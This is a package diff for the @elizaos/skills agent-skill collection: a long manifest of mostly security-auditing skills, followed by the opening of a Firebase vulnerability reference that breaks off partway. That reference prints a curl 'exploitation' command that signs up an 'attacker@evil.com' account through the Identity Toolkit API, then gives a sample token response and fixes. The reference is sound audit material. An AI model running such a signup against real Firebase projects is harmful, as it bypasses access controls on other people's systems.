@elizaos/skills 2.0.0-alpha.3
- package/README.md +126 -0
- package/package.json +53 -0
- package/skills/1password/SKILL.md +70 -0
- package/skills/1password/references/cli-examples.md +29 -0
- package/skills/1password/references/get-started.md +17 -0
- package/skills/apple-notes/SKILL.md +77 -0
- package/skills/apple-reminders/SKILL.md +96 -0
- package/skills/bear-notes/SKILL.md +107 -0
- package/skills/bird/SKILL.md +224 -0
- package/skills/blogwatcher/SKILL.md +69 -0
- package/skills/blucli/SKILL.md +47 -0
- package/skills/bluebubbles/SKILL.md +131 -0
- package/skills/camsnap/SKILL.md +45 -0
- package/skills/canvas/SKILL.md +203 -0
- package/skills/clawhub/SKILL.md +77 -0
- package/skills/coding-agent/SKILL.md +284 -0
- package/skills/discord/SKILL.md +578 -0
- package/skills/eightctl/SKILL.md +50 -0
- package/skills/food-order/SKILL.md +48 -0
- package/skills/gemini/SKILL.md +43 -0
- package/skills/gifgrep/SKILL.md +79 -0
- package/skills/github/SKILL.md +77 -0
- package/skills/gog/SKILL.md +116 -0
- package/skills/goplaces/SKILL.md +52 -0
- package/skills/healthcheck/SKILL.md +245 -0
- package/skills/himalaya/SKILL.md +257 -0
- package/skills/himalaya/references/configuration.md +184 -0
- package/skills/himalaya/references/message-composition.md +199 -0
- package/skills/imsg/SKILL.md +74 -0
- package/skills/local-places/SERVER_README.md +101 -0
- package/skills/local-places/SKILL.md +102 -0
- package/skills/local-places/pyproject.toml +21 -0
- package/skills/local-places/src/local_places/__init__.py +2 -0
- package/skills/local-places/src/local_places/google_places.py +314 -0
- package/skills/local-places/src/local_places/main.py +65 -0
- package/skills/local-places/src/local_places/schemas.py +107 -0
- package/skills/mcporter/SKILL.md +61 -0
- package/skills/model-usage/SKILL.md +69 -0
- package/skills/model-usage/references/codexbar-cli.md +33 -0
- package/skills/model-usage/scripts/model_usage.py +310 -0
- package/skills/nano-banana-pro/SKILL.md +58 -0
- package/skills/nano-banana-pro/scripts/generate_image.py +184 -0
- package/skills/nano-pdf/SKILL.md +38 -0
- package/skills/notion/SKILL.md +172 -0
- package/skills/obsidian/SKILL.md +81 -0
- package/skills/openai-image-gen/SKILL.md +89 -0
- package/skills/openai-image-gen/scripts/gen.py +240 -0
- package/skills/openai-whisper/SKILL.md +38 -0
- package/skills/openai-whisper-api/SKILL.md +52 -0
- package/skills/openai-whisper-api/scripts/transcribe.sh +85 -0
- package/skills/openhue/SKILL.md +51 -0
- package/skills/oracle/SKILL.md +125 -0
- package/skills/ordercli/SKILL.md +78 -0
- package/skills/peekaboo/SKILL.md +190 -0
- package/skills/sag/SKILL.md +87 -0
- package/skills/security-ask-questions-if-underspecified/.claude-plugin/plugin.json +10 -0
- package/skills/security-ask-questions-if-underspecified/README.md +24 -0
- package/skills/security-ask-questions-if-underspecified/skills/ask-questions-if-underspecified/SKILL.md +85 -0
- package/skills/security-audit-context-building/.claude-plugin/plugin.json +10 -0
- package/skills/security-audit-context-building/README.md +58 -0
- package/skills/security-audit-context-building/commands/audit-context.md +21 -0
- package/skills/security-audit-context-building/skills/audit-context-building/SKILL.md +297 -0
- package/skills/security-audit-context-building/skills/audit-context-building/resources/COMPLETENESS_CHECKLIST.md +47 -0
- package/skills/security-audit-context-building/skills/audit-context-building/resources/FUNCTION_MICRO_ANALYSIS_EXAMPLE.md +355 -0
- package/skills/security-audit-context-building/skills/audit-context-building/resources/OUTPUT_REQUIREMENTS.md +71 -0
- package/skills/security-building-secure-contracts/.claude-plugin/plugin.json +10 -0
- package/skills/security-building-secure-contracts/README.md +241 -0
- package/skills/security-building-secure-contracts/skills/algorand-vulnerability-scanner/SKILL.md +284 -0
- package/skills/security-building-secure-contracts/skills/algorand-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +405 -0
- package/skills/security-building-secure-contracts/skills/audit-prep-assistant/SKILL.md +409 -0
- package/skills/security-building-secure-contracts/skills/cairo-vulnerability-scanner/SKILL.md +329 -0
- package/skills/security-building-secure-contracts/skills/cairo-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +722 -0
- package/skills/security-building-secure-contracts/skills/code-maturity-assessor/SKILL.md +218 -0
- package/skills/security-building-secure-contracts/skills/code-maturity-assessor/resources/ASSESSMENT_CRITERIA.md +355 -0
- package/skills/security-building-secure-contracts/skills/code-maturity-assessor/resources/EXAMPLE_REPORT.md +248 -0
- package/skills/security-building-secure-contracts/skills/code-maturity-assessor/resources/REPORT_FORMAT.md +33 -0
- package/skills/security-building-secure-contracts/skills/cosmos-vulnerability-scanner/SKILL.md +334 -0
- package/skills/security-building-secure-contracts/skills/cosmos-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +740 -0
- package/skills/security-building-secure-contracts/skills/guidelines-advisor/SKILL.md +252 -0
- package/skills/security-building-secure-contracts/skills/guidelines-advisor/resources/ASSESSMENT_AREAS.md +329 -0
- package/skills/security-building-secure-contracts/skills/guidelines-advisor/resources/DELIVERABLES.md +118 -0
- package/skills/security-building-secure-contracts/skills/guidelines-advisor/resources/EXAMPLE_REPORT.md +298 -0
- package/skills/security-building-secure-contracts/skills/secure-workflow-guide/SKILL.md +161 -0
- package/skills/security-building-secure-contracts/skills/secure-workflow-guide/resources/EXAMPLE_REPORT.md +279 -0
- package/skills/security-building-secure-contracts/skills/secure-workflow-guide/resources/WORKFLOW_STEPS.md +132 -0
- package/skills/security-building-secure-contracts/skills/solana-vulnerability-scanner/SKILL.md +389 -0
- package/skills/security-building-secure-contracts/skills/solana-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +669 -0
- package/skills/security-building-secure-contracts/skills/substrate-vulnerability-scanner/SKILL.md +298 -0
- package/skills/security-building-secure-contracts/skills/substrate-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +791 -0
- package/skills/security-building-secure-contracts/skills/token-integration-analyzer/SKILL.md +362 -0
- package/skills/security-building-secure-contracts/skills/token-integration-analyzer/resources/ASSESSMENT_CATEGORIES.md +571 -0
- package/skills/security-building-secure-contracts/skills/token-integration-analyzer/resources/REPORT_TEMPLATES.md +141 -0
- package/skills/security-building-secure-contracts/skills/ton-vulnerability-scanner/SKILL.md +388 -0
- package/skills/security-building-secure-contracts/skills/ton-vulnerability-scanner/resources/VULNERABILITY_PATTERNS.md +595 -0
- package/skills/security-burpsuite-project-parser/.claude-plugin/plugin.json +10 -0
- package/skills/security-burpsuite-project-parser/README.md +103 -0
- package/skills/security-burpsuite-project-parser/commands/burp-search.md +18 -0
- package/skills/security-burpsuite-project-parser/skills/SKILL.md +358 -0
- package/skills/security-burpsuite-project-parser/skills/scripts/burp-search.sh +99 -0
- package/skills/security-claude-in-chrome-troubleshooting/.claude-plugin/plugin.json +8 -0
- package/skills/security-claude-in-chrome-troubleshooting/README.md +31 -0
- package/skills/security-claude-in-chrome-troubleshooting/skills/claude-in-chrome-troubleshooting/SKILL.md +251 -0
- package/skills/security-constant-time-analysis/.claude-plugin/plugin.json +9 -0
- package/skills/security-constant-time-analysis/README.md +381 -0
- package/skills/security-constant-time-analysis/commands/ct-check.md +20 -0
- package/skills/security-constant-time-analysis/ct_analyzer/__init__.py +49 -0
- package/skills/security-constant-time-analysis/ct_analyzer/analyzer.py +1284 -0
- package/skills/security-constant-time-analysis/ct_analyzer/script_analyzers.py +3081 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/__init__.py +1 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_analyzer.py +1397 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/bn_excerpt.js +205 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/decompose_constant_time.c +181 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/decompose_vulnerable.c +74 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/decompose_vulnerable.go +78 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/decompose_vulnerable.rs +92 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.cs +174 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.java +161 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.kt +181 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.php +140 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.py +252 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.rb +188 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.swift +199 -0
- package/skills/security-constant-time-analysis/ct_analyzer/tests/test_samples/vulnerable.ts +154 -0
- package/skills/security-constant-time-analysis/pyproject.toml +52 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/README.md +90 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/SKILL.md +219 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/compiled.md +129 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/javascript.md +136 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/kotlin.md +252 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/php.md +172 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/python.md +179 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/ruby.md +198 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/swift.md +288 -0
- package/skills/security-constant-time-analysis/skills/constant-time-analysis/references/vm-compiled.md +354 -0
- package/skills/security-constant-time-analysis/uv.lock +8 -0
- package/skills/security-culture-index/.claude-plugin/plugin.json +8 -0
- package/skills/security-culture-index/README.md +79 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/SKILL.md +293 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/anti-patterns.md +255 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/conversation-starters.md +408 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/interview-trait-signals.md +253 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/motivators.md +158 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/patterns-archetypes.md +147 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/primary-traits.md +307 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/secondary-traits.md +228 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/references/team-composition.md +148 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/check_deps.py +108 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/__init__.py +20 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/constants.py +122 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/extract.py +187 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/models.py +16 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/culture_index/opencv_extractor.py +520 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/extract_pdf.py +237 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/scripts/pyproject.toml +18 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/burnout-report.md +113 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/comparison-report.md +103 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/hiring-profile.md +127 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/individual-report.md +85 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/predicted-profile.md +165 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/templates/team-report.md +109 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/analyze-team.md +188 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/coach-manager.md +267 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/compare-profiles.md +188 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/define-hiring-profile.md +220 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/detect-burnout.md +206 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/extract-from-pdf.md +121 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/interpret-individual.md +183 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/interview-debrief.md +234 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/mediate-conflict.md +306 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/plan-onboarding.md +322 -0
- package/skills/security-culture-index/skills/interpreting-culture-index/workflows/predict-from-interview.md +250 -0
- package/skills/security-differential-review/.claude-plugin/plugin.json +10 -0
- package/skills/security-differential-review/README.md +109 -0
- package/skills/security-differential-review/commands/diff-review.md +21 -0
- package/skills/security-differential-review/skills/differential-review/SKILL.md +220 -0
- package/skills/security-differential-review/skills/differential-review/adversarial.md +203 -0
- package/skills/security-differential-review/skills/differential-review/methodology.md +234 -0
- package/skills/security-differential-review/skills/differential-review/patterns.md +300 -0
- package/skills/security-differential-review/skills/differential-review/reporting.md +369 -0
- package/skills/security-dwarf-expert/.claude-plugin/plugin.json +10 -0
- package/skills/security-dwarf-expert/README.md +38 -0
- package/skills/security-dwarf-expert/skills/dwarf-expert/SKILL.md +93 -0
- package/skills/security-dwarf-expert/skills/dwarf-expert/reference/coding.md +31 -0
- package/skills/security-dwarf-expert/skills/dwarf-expert/reference/dwarfdump.md +50 -0
- package/skills/security-dwarf-expert/skills/dwarf-expert/reference/readelf.md +8 -0
- package/skills/security-entry-point-analyzer/.claude-plugin/plugin.json +10 -0
- package/skills/security-entry-point-analyzer/README.md +74 -0
- package/skills/security-entry-point-analyzer/commands/entry-points.md +18 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/SKILL.md +251 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/cosmwasm.md +182 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/move-aptos.md +107 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/move-sui.md +87 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/solana.md +155 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/solidity.md +135 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/ton.md +185 -0
- package/skills/security-entry-point-analyzer/skills/entry-point-analyzer/references/vyper.md +141 -0
- package/skills/security-firebase-apk-scanner/.claude-plugin/plugin.json +10 -0
- package/skills/security-firebase-apk-scanner/README.md +85 -0
- package/skills/security-firebase-apk-scanner/commands/scan-apk.md +18 -0
- package/skills/security-firebase-apk-scanner/scanner.sh +1408 -0
- package/skills/security-firebase-apk-scanner/skills/firebase-apk-scanner/SKILL.md +197 -0
- package/skills/security-firebase-apk-scanner/skills/firebase-apk-scanner/references/vulnerabilities.md +803 -0
- package/skills/security-fix-review/.claude-plugin/plugin.json +13 -0
- package/skills/security-fix-review/README.md +118 -0
- package/skills/security-fix-review/commands/fix-review.md +24 -0
- package/skills/security-fix-review/skills/fix-review/SKILL.md +264 -0
- package/skills/security-fix-review/skills/fix-review/references/bug-detection.md +408 -0
- package/skills/security-fix-review/skills/fix-review/references/finding-matching.md +298 -0
- package/skills/security-fix-review/skills/fix-review/references/report-parsing.md +398 -0
- package/skills/security-insecure-defaults/.claude-plugin/plugin.json +10 -0
- package/skills/security-insecure-defaults/README.md +45 -0
- package/skills/security-insecure-defaults/skills/insecure-defaults/SKILL.md +117 -0
- package/skills/security-insecure-defaults/skills/insecure-defaults/references/examples.md +409 -0
- package/skills/security-modern-python/.claude-plugin/plugin.json +10 -0
- package/skills/security-modern-python/README.md +58 -0
- package/skills/security-modern-python/hooks/hooks.json +16 -0
- package/skills/security-modern-python/hooks/intercept-legacy-python.bats +388 -0
- package/skills/security-modern-python/hooks/intercept-legacy-python.sh +109 -0
- package/skills/security-modern-python/hooks/test_helper.bash +75 -0
- package/skills/security-modern-python/skills/modern-python/SKILL.md +333 -0
- package/skills/security-modern-python/skills/modern-python/references/dependabot.md +43 -0
- package/skills/security-modern-python/skills/modern-python/references/migration-checklist.md +141 -0
- package/skills/security-modern-python/skills/modern-python/references/pep723-scripts.md +259 -0
- package/skills/security-modern-python/skills/modern-python/references/prek.md +211 -0
- package/skills/security-modern-python/skills/modern-python/references/pyproject.md +254 -0
- package/skills/security-modern-python/skills/modern-python/references/ruff-config.md +240 -0
- package/skills/security-modern-python/skills/modern-python/references/security-setup.md +255 -0
- package/skills/security-modern-python/skills/modern-python/references/testing.md +284 -0
- package/skills/security-modern-python/skills/modern-python/references/uv-commands.md +200 -0
- package/skills/security-modern-python/skills/modern-python/templates/dependabot.yml +36 -0
- package/skills/security-modern-python/skills/modern-python/templates/pre-commit-config.yaml +66 -0
- package/skills/security-property-based-testing/.claude-plugin/plugin.json +9 -0
- package/skills/security-property-based-testing/README.md +47 -0
- package/skills/security-property-based-testing/skills/property-based-testing/README.md +88 -0
- package/skills/security-property-based-testing/skills/property-based-testing/SKILL.md +109 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/design.md +191 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/generating.md +200 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/libraries.md +130 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/refactoring.md +181 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/reviewing.md +209 -0
- package/skills/security-property-based-testing/skills/property-based-testing/references/strategies.md +124 -0
- package/skills/semgrep-rule-creator/.claude-plugin/plugin.json +8 -0
- package/skills/semgrep-rule-creator/README.md +43 -0
- package/skills/semgrep-rule-creator/commands/semgrep-rule.md +26 -0
- package/skills/semgrep-rule-creator/skills/semgrep-rule-creator/SKILL.md +168 -0
- package/skills/semgrep-rule-creator/skills/semgrep-rule-creator/references/quick-reference.md +203 -0
- package/skills/semgrep-rule-creator/skills/semgrep-rule-creator/references/workflow.md +240 -0
- package/skills/semgrep-rule-variant-creator/.claude-plugin/plugin.json +9 -0
- package/skills/semgrep-rule-variant-creator/README.md +86 -0
- package/skills/semgrep-rule-variant-creator/skills/semgrep-rule-variant-creator/SKILL.md +205 -0
- package/skills/semgrep-rule-variant-creator/skills/semgrep-rule-variant-creator/references/applicability-analysis.md +250 -0
- package/skills/semgrep-rule-variant-creator/skills/semgrep-rule-variant-creator/references/language-syntax-guide.md +324 -0
- package/skills/semgrep-rule-variant-creator/skills/semgrep-rule-variant-creator/references/workflow.md +518 -0
- package/skills/session-logs/SKILL.md +115 -0
- package/skills/sharp-edges/.claude-plugin/plugin.json +10 -0
- package/skills/sharp-edges/README.md +48 -0
- package/skills/sharp-edges/skills/sharp-edges/SKILL.md +292 -0
- package/skills/sharp-edges/skills/sharp-edges/references/auth-patterns.md +252 -0
- package/skills/sharp-edges/skills/sharp-edges/references/case-studies.md +274 -0
- package/skills/sharp-edges/skills/sharp-edges/references/config-patterns.md +333 -0
- package/skills/sharp-edges/skills/sharp-edges/references/crypto-apis.md +190 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-c.md +205 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-csharp.md +285 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-go.md +270 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-java.md +263 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-javascript.md +269 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-kotlin.md +265 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-php.md +245 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-python.md +274 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-ruby.md +273 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-rust.md +272 -0
- package/skills/sharp-edges/skills/sharp-edges/references/lang-swift.md +287 -0
- package/skills/sharp-edges/skills/sharp-edges/references/language-specific.md +588 -0
- package/skills/sherpa-onnx-tts/SKILL.md +103 -0
- package/skills/sherpa-onnx-tts/bin/sherpa-onnx-tts +178 -0
- package/skills/skill-creator/SKILL.md +370 -0
- package/skills/skill-creator/license.txt +202 -0
- package/skills/skill-creator/scripts/init_skill.py +378 -0
- package/skills/skill-creator/scripts/package_skill.py +111 -0
- package/skills/skill-creator/scripts/quick_validate.py +101 -0
- package/skills/slack/SKILL.md +144 -0
- package/skills/songsee/SKILL.md +49 -0
- package/skills/sonoscli/SKILL.md +46 -0
- package/skills/spec-to-code-compliance/.claude-plugin/plugin.json +10 -0
- package/skills/spec-to-code-compliance/README.md +67 -0
- package/skills/spec-to-code-compliance/commands/spec-compliance.md +22 -0
- package/skills/spec-to-code-compliance/skills/spec-to-code-compliance/SKILL.md +349 -0
- package/skills/spec-to-code-compliance/skills/spec-to-code-compliance/resources/COMPLETENESS_CHECKLIST.md +69 -0
- package/skills/spec-to-code-compliance/skills/spec-to-code-compliance/resources/IR_EXAMPLES.md +417 -0
- package/skills/spec-to-code-compliance/skills/spec-to-code-compliance/resources/OUTPUT_REQUIREMENTS.md +105 -0
- package/skills/spotify-player/SKILL.md +64 -0
- package/skills/static-analysis/.claude-plugin/plugin.json +8 -0
- package/skills/static-analysis/README.md +59 -0
- package/skills/static-analysis/skills/codeql/SKILL.md +315 -0
- package/skills/static-analysis/skills/sarif-parsing/SKILL.md +479 -0
- package/skills/static-analysis/skills/sarif-parsing/resources/jq-queries.md +162 -0
- package/skills/static-analysis/skills/sarif-parsing/resources/sarif_helpers.py +331 -0
- package/skills/static-analysis/skills/semgrep/SKILL.md +337 -0
- package/skills/summarize/SKILL.md +87 -0
- package/skills/testing-handbook-skills/.claude-plugin/plugin.json +8 -0
- package/skills/testing-handbook-skills/README.md +241 -0
- package/skills/testing-handbook-skills/scripts/pyproject.toml +8 -0
- package/skills/testing-handbook-skills/scripts/validate-skills.py +657 -0
- package/skills/testing-handbook-skills/skills/address-sanitizer/SKILL.md +341 -0
- package/skills/testing-handbook-skills/skills/aflpp/SKILL.md +640 -0
- package/skills/testing-handbook-skills/skills/atheris/SKILL.md +515 -0
- package/skills/testing-handbook-skills/skills/cargo-fuzz/SKILL.md +454 -0
- package/skills/testing-handbook-skills/skills/codeql/SKILL.md +549 -0
- package/skills/testing-handbook-skills/skills/constant-time-testing/SKILL.md +507 -0
- package/skills/testing-handbook-skills/skills/coverage-analysis/SKILL.md +607 -0
- package/skills/testing-handbook-skills/skills/fuzzing-dictionary/SKILL.md +297 -0
- package/skills/testing-handbook-skills/skills/fuzzing-obstacles/SKILL.md +426 -0
- package/skills/testing-handbook-skills/skills/harness-writing/SKILL.md +614 -0
- package/skills/testing-handbook-skills/skills/libafl/SKILL.md +625 -0
- package/skills/testing-handbook-skills/skills/libfuzzer/SKILL.md +795 -0
- package/skills/testing-handbook-skills/skills/ossfuzz/SKILL.md +426 -0
- package/skills/testing-handbook-skills/skills/ruzzy/SKILL.md +443 -0
- package/skills/testing-handbook-skills/skills/semgrep/SKILL.md +601 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/SKILL.md +372 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/agent-prompt.md +280 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/discovery.md +452 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/templates/domain-skill.md +504 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/templates/fuzzer-skill.md +454 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/templates/technique-skill.md +527 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/templates/tool-skill.md +366 -0
- package/skills/testing-handbook-skills/skills/testing-handbook-generator/testing.md +482 -0
- package/skills/testing-handbook-skills/skills/wycheproof/SKILL.md +533 -0
- package/skills/things-mac/SKILL.md +86 -0
- package/skills/tmux/SKILL.md +135 -0
- package/skills/tmux/scripts/find-sessions.sh +112 -0
- package/skills/tmux/scripts/wait-for-text.sh +83 -0
- package/skills/trello/SKILL.md +95 -0
- package/skills/variant-analysis/.claude-plugin/plugin.json +8 -0
- package/skills/variant-analysis/README.md +41 -0
- package/skills/variant-analysis/commands/variants.md +23 -0
- package/skills/variant-analysis/skills/variant-analysis/METHODOLOGY.md +327 -0
- package/skills/variant-analysis/skills/variant-analysis/SKILL.md +142 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/cpp.ql +119 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/go.ql +69 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/java.ql +71 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/javascript.ql +63 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/codeql/python.ql +80 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/cpp.yaml +98 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/go.yaml +63 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/java.yaml +61 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/javascript.yaml +60 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/semgrep/python.yaml +72 -0
- package/skills/variant-analysis/skills/variant-analysis/resources/variant-report-template.md +75 -0
- package/skills/video-frames/SKILL.md +46 -0
- package/skills/video-frames/scripts/frame.sh +81 -0
- package/skills/voice-call/SKILL.md +45 -0
- package/skills/wacli/SKILL.md +72 -0
- package/skills/weather/SKILL.md +54 -0
- package/skills/yara-authoring/.claude-plugin/plugin.json +9 -0
- package/skills/yara-authoring/README.md +131 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/SKILL.md +645 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/MAL_Mac_ProtonRAT_Jan25.yar +99 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/MAL_NPM_SupplyChain_Jan25.yar +170 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/MAL_Win_Remcos_Jan25.yar +103 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/SUSP_CRX_SuspiciousPermissions.yar +134 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/examples/SUSP_JS_Obfuscation_Jan25.yar +185 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/crx-module.md +214 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/dex-module.md +383 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/performance.md +333 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/strings.md +433 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/style-guide.md +257 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/references/testing.md +399 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/scripts/atom_analyzer.py +526 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/scripts/pyproject.toml +25 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/scripts/yara_lint.py +631 -0
- package/skills/yara-authoring/skills/yara-rule-authoring/workflows/rule-development.md +493 -0
|
@@ -0,0 +1,803 @@
|
|
|
1
|
+
# Firebase Security Vulnerability Patterns
|
|
2
|
+
|
|
3
|
+
Detailed vulnerability patterns, exploitation techniques, and audit checklists for Firebase implementations in mobile applications.
|
|
4
|
+
|
|
5
|
+
---
|
|
6
|
+
|
|
7
|
+
## 1. OPEN EMAIL/PASSWORD SIGNUP (Critical)
|
|
8
|
+
|
|
9
|
+
**The Problem:** Firebase Authentication allows anyone to create accounts via the Identity Toolkit API, even if the app UI doesn't expose registration.
|
|
10
|
+
|
|
11
|
+
**Vulnerable Configuration:**
|
|
12
|
+
```
|
|
13
|
+
Firebase Console → Authentication → Sign-in method → Email/Password: Enabled
|
|
14
|
+
```
|
|
15
|
+
|
|
16
|
+
**Exploitation:**
|
|
17
|
+
```bash
|
|
18
|
+
# Create arbitrary account via API
|
|
19
|
+
curl -X POST \
|
|
20
|
+
-H "Content-Type: application/json" \
|
|
21
|
+
-d '{"email":"attacker@evil.com","password":"Password123!","returnSecureToken":true}' \
|
|
22
|
+
"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=AIzaXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
|
23
|
+
```
|
|
24
|
+
|
|
25
|
+
**Successful Attack Response:**
|
|
26
|
+
```json
|
|
27
|
+
{
|
|
28
|
+
"idToken": "eyJhbGciOiJSUzI1NiIs...",
|
|
29
|
+
"email": "attacker@evil.com",
|
|
30
|
+
"refreshToken": "AGEhc0C...",
|
|
31
|
+
"expiresIn": "3600",
|
|
32
|
+
"localId": "abc123xyz"
|
|
33
|
+
}
|
|
34
|
+
```
|
|
35
|
+
|
|
36
|
+
**Impact:**
|
|
37
|
+
- Bypass invite-only systems
|
|
38
|
+
- Access authenticated-only resources
|
|
39
|
+
- Exhaust authentication quotas
|
|
40
|
+
- Potential for account enumeration attacks
|
|
41
|
+
|
|
42
|
+
**Secure Configuration:**
|
|
43
|
+
```
|
|
44
|
+
Firebase Console → Authentication → Settings → User Actions:
|
|
45
|
+
☐ Enable create (sign-up) ← DISABLE THIS
|
|
46
|
+
☑ Enable delete
|
|
47
|
+
|
|
48
|
+
Or use Admin SDK for user creation only:
|
|
49
|
+
```
|
|
50
|
+
```javascript
|
|
51
|
+
// Server-side only user creation
|
|
52
|
+
const admin = require('firebase-admin');
|
|
53
|
+
admin.auth().createUser({
|
|
54
|
+
email: 'user@example.com',
|
|
55
|
+
password: 'securePassword123'
|
|
56
|
+
});
|
|
57
|
+
```
|
|
58
|
+
|
|
59
|
+
**Audit Checklist:**
|
|
60
|
+
- [ ] Test `accounts:signUp` endpoint with API key
|
|
61
|
+
